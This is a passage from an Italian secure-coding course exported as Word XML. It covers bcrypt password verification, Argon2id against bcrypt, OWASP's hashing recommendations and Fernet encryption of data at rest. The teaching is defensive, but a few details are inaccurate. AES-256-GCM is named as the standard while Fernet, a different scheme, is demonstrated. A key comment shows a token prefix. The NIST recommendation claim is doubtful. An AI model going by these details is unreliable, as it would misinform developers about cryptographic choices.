        <w:t xml:space="preserve">#             ("mario", hash_password.decode("utf-8")))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># LOGIN</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tentativo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"MioSegreto123!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_dal_db </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"$2b$12$8x7K2n9PqW3zMn8aBcDeFugOoO0ggTV4TtgJWxR8U5w2vJk7rQHxq"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.checkpw(tentativo, hash_dal_db):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Password corretta"</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"Password errata"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinque righe. Difficile sbagliare.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Questa è la difesa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="324"/>
    <w:bookmarkStart w:id="325" w:name="curiosità-ogni-volta-hash-diverso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Curiosità: ogni volta hash diverso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esegui più volte:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"ciao"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, bcrypt.gensalt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'$2b$12$Ks93ngQVw7c3RzFfFFlXYeKx6T7M2K8HTmy7Y6rKsbEZ5PmL3PqIa'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"ciao"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, bcrypt.gensalt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'$2b$12$ZQp2x8v3RcU6jJ3sLK8m.eKyY2VGbN9nC0PFQvT1MqA8E5hN3xJ7m'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hash diversi per la stessa password, perché ogni chiamata genera un salt nuovo. La verifica funziona comunque:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">checkpw()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">recupera il salt dall’hash salvato e ricalcola.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="325"/>
    <w:bookmarkEnd w:id="326"/>
    <w:bookmarkStart w:id="328" w:name="argon2id-lalternativa-moderna"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="532" w:name="sec_7_7"/>
      <w:r>
        <w:t xml:space="preserve">7.7 Argon2id: l’alternativa moderna</w:t>
      </w:r>
      <w:bookmarkEnd w:id="532"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Argon2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ha vinto la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Password Hashing Competition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del 2015. È raccomandato da NIST per i nuovi sistemi. Tre varianti: Argon2d, Argon2i,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Argon2id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(ibrida, raccomandata).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vantaggi su bcrypt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Memory-hard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: richiede grandi quantità di RAM per il calcolo, rendendo molto più costoso l’attacco con GPU/FPGA/ASIC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1123"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tre parametri configurabili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: tempo, memoria, parallelismo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando usare Argon2id invece di bcrypt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nuovi progetti senza vincoli legacy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sistemi ad alta sicurezza che giustificano il costo extra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1124"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando hai uno stack moderno (Python 3.10+, librerie aggiornate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando bcrypt va benissimo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1125"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutto il resto.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt cost 12+ è ancora un’ottima scelta nel 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Python: libreria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">argon2-cffi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> argon2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PasswordHasher</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ph </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PasswordHasher()  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># parametri di default sicuri</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ph.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"MioSegreto123!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Salva hash_password nel DB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ph.verify(hash_password, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"MioSegreto123!"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"OK"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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"Errata"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="327" w:name="quale-scegliere"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quale scegliere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Password Storage Cheat Sheet (2024) raccomanda, in ordine di preferenza:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Argon2id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(parametri minimi: 19 MiB di memoria, 2 iterazioni, 1 grado di parallelismo)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">scrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(memory-hard, alternativa storica)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cost 10+ per nuovi sistemi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">PBKDF2-HMAC-SHA256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(almeno 600.000 iterazioni)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il corso useremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per la sua semplicità d’uso, ma sappi che Argon2id è la scelta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stato dell’arte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per nuovi progetti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="327"/>
    <w:bookmarkEnd w:id="328"/>
    <w:bookmarkStart w:id="329" w:name="cifratura-dei-dati-a-riposo-cenno"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="533" w:name="sec_7_8"/>
      <w:r>
        <w:t xml:space="preserve">7.8 Cifratura dei dati a riposo (cenno)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="533"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le password sono il caso d’uso principale dell’hashing. Ma esistono dati che</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">devi poter recuperare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: numeri di carta di credito da addebitare, documenti da mostrare al cliente, messaggi privati. Per quelli serve la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo standard moderno è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">AES-256 in modalità GCM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Galois/Counter Mode), una cifratura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">autenticata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: garantisce sia confidenzialità (chi non ha la chiave non legge) sia integrità (chi modifica il dato cifrato viene rilevato).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Python, la libreria standard è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cryptography</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cryptography.fernet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fernet</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Genera una chiave (una sola volta, da conservare in modo sicuro)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chiave </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fernet.generate_key()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(chiave)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># b'gAAAAABl...' — 32 bytes base64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cifra</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fernet(chiave)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">testo_cifrato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f.encrypt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"4111-1111-1111-1111"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># numero carta</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(testo_cifrato)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># b'gAAAAABnaXxoQ...'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Decifra (in un altro punto del codice, con la stessa chiave)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">testo_chiaro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f.decrypt(testo_cifrato)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
